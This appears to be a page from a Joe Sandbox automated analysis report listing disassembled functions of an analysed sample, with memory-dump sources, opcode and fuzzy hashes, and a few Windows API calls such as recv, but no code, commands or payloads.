                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 9f3abccda89915eed624bccc3cda7084f7b8a3a6c504054953220c97c28a954d
                                                                                                                                                                                                • Instruction ID: 79d4386450945693273e3fc1b187b0702da5d36eae7de0e9d6007dbf09643c10
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f3abccda89915eed624bccc3cda7084f7b8a3a6c504054953220c97c28a954d
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB01D6AB10E284BEB242E660661C6F62FAEE9C327033488BBF442CE503D1954D4BD371
                                                                                                                                                                                                Function 05660CAA Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 7d637870b6e2320f623b628c819f0dc2dc4e136a38459187b4da747ce5fba38c
                                                                                                                                                                                                • Instruction ID: 1097198ea5a0fbebfd6285024a8ab930a3d33a5931af2ec0a5e97107d33a6c1a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d637870b6e2320f623b628c819f0dc2dc4e136a38459187b4da747ce5fba38c
                                                                                                                                                                                                • Instruction Fuzzy Hash: C1E0EDBB14D410BD7141D6417B2DAFA67ADE5C17303708937F406C6401D2A45D9AD671
                                                                                                                                                                                                Function 05660CB8 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: f6b67ba3e6b989cbc29db527a4cc5ae0d430cff2d5297c1a70f2c18c3e9773ef
                                                                                                                                                                                                • Instruction ID: 5181474ea2656ed19d2982eae21ac19852689d28a2049c2eee5f9abae53b76b6
                                                                                                                                                                                                • Opcode Fuzzy Hash: f6b67ba3e6b989cbc29db527a4cc5ae0d430cff2d5297c1a70f2c18c3e9773ef
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAE065AB00C010BCB185CA516B189BAA7ADE1C17303308A37F806C6802E2A80E9AA231
                                                                                                                                                                                                Function 05660CFF Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1773604194.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5660000_file.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 8e21cf156f5fe0c06963b29ddf8fe61eb6a45afba434d2afb2ed01f1f628dd74
                                                                                                                                                                                                • Instruction ID: c289699b8ad0125513211a58fe9ac3530dd437b0132953e2071f1de78e1a6d3e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e21cf156f5fe0c06963b29ddf8fe61eb6a45afba434d2afb2ed01f1f628dd74
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AD0223B409800EF82A0CA41F84D53873B8FB402343004AF6F0828B040C738A022D760

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 00F031A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __floor_pentium4
                                                                                                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                • API String ID: 4168288129-2761157908
                                                                                                                                                                                                • Opcode ID: 10c3e409f3f8d05793b1a2dc28a283b9ed64b20c8a7520f7d307e0194414bc15
                                                                                                                                                                                                • Instruction ID: 9d126fb6b94a478a71dd1af96fa397676626f60b247e745d70f66ffd75f0c15c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 10c3e409f3f8d05793b1a2dc28a283b9ed64b20c8a7520f7d307e0194414bc15
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45C24EB2E046298FDB25CE28DD407E9B3F9EB44315F1441EAD94DE7280E775AE81AF40
                                                                                                                                                                                                Function 00ECE0C0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 00ECE10B
                                                                                                                                                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 00ECE140
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: recv
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                                                                                • Opcode ID: 90ca8ba112985f6284506354396ab52afb96508760c11b9d92c67906cdb4af0f
                                                                                                                                                                                                • Instruction ID: 7355f78954e41338fd8f8183ef9c7cbff501246efa24e5661294170aedee6bc7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 90ca8ba112985f6284506354396ab52afb96508760c11b9d92c67906cdb4af0f
                                                                                                                                                                                                • Instruction Fuzzy Hash: C231A471A002489BD720CB68DC86FEB77BCEB08778F141629E515F7391DA75A846CBA0
                                                                                                                                                                                                Function 00F02D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771968014.000000000114F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771982640.0000000001150000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771998260.0000000001159000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772013221.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772033133.0000000001176000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772049778.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772091483.00000000011C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772107669.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772122219.00000000011C8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772137754.00000000011CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772152322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772168688.00000000011DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1772183931.00000000011DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 376a5576fd4b68412969484e8d56b81b9300990959441ba6e7d287c5c1a7ddeb
                                                                                                                                                                                                • Instruction ID: b8406b45b8f6c232b396bcb4e0c1a971b4a49d78c0cea4d051555fc0440b8f77
                                                                                                                                                                                                • Opcode Fuzzy Hash: 376a5576fd4b68412969484e8d56b81b9300990959441ba6e7d287c5c1a7ddeb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF13F71E012199FDF14CFA8C8806AEF7B5FF48324F25826AD915A7385D731AE41DB90
                                                                                                                                                                                                Function 00EDCBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemTimePreciseAsFileTime.KERNEL32(?,00EDCF52,?,00000003,00000003,?,00EDCF87,?,?,?,00000003,00000003,?,00EDC4FD,00EC2FB9,00000001), ref: 00EDCC03
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1771315072.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771332626.0000000000F22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771389931.0000000000F29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771405767.0000000000F2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771424131.0000000000F37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771530382.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771548808.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771570054.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771586419.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771601838.00000000010B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771635794.00000000010C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771651583.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771667881.00000000010CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771683261.00000000010CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771704218.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771720321.00000000010EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771737620.00000000010F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771774087.0000000001111000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771790150.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771805211.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771821455.000000000111B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771838515.0000000001124000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771854943.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771872547.0000000001137000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771889671.000000000113B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771905564.000000000113C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771920982.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771937022.0000000001146000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1771952031.0000000001147000.00000040.00000001.01000000.00000003.sdmpDownload File
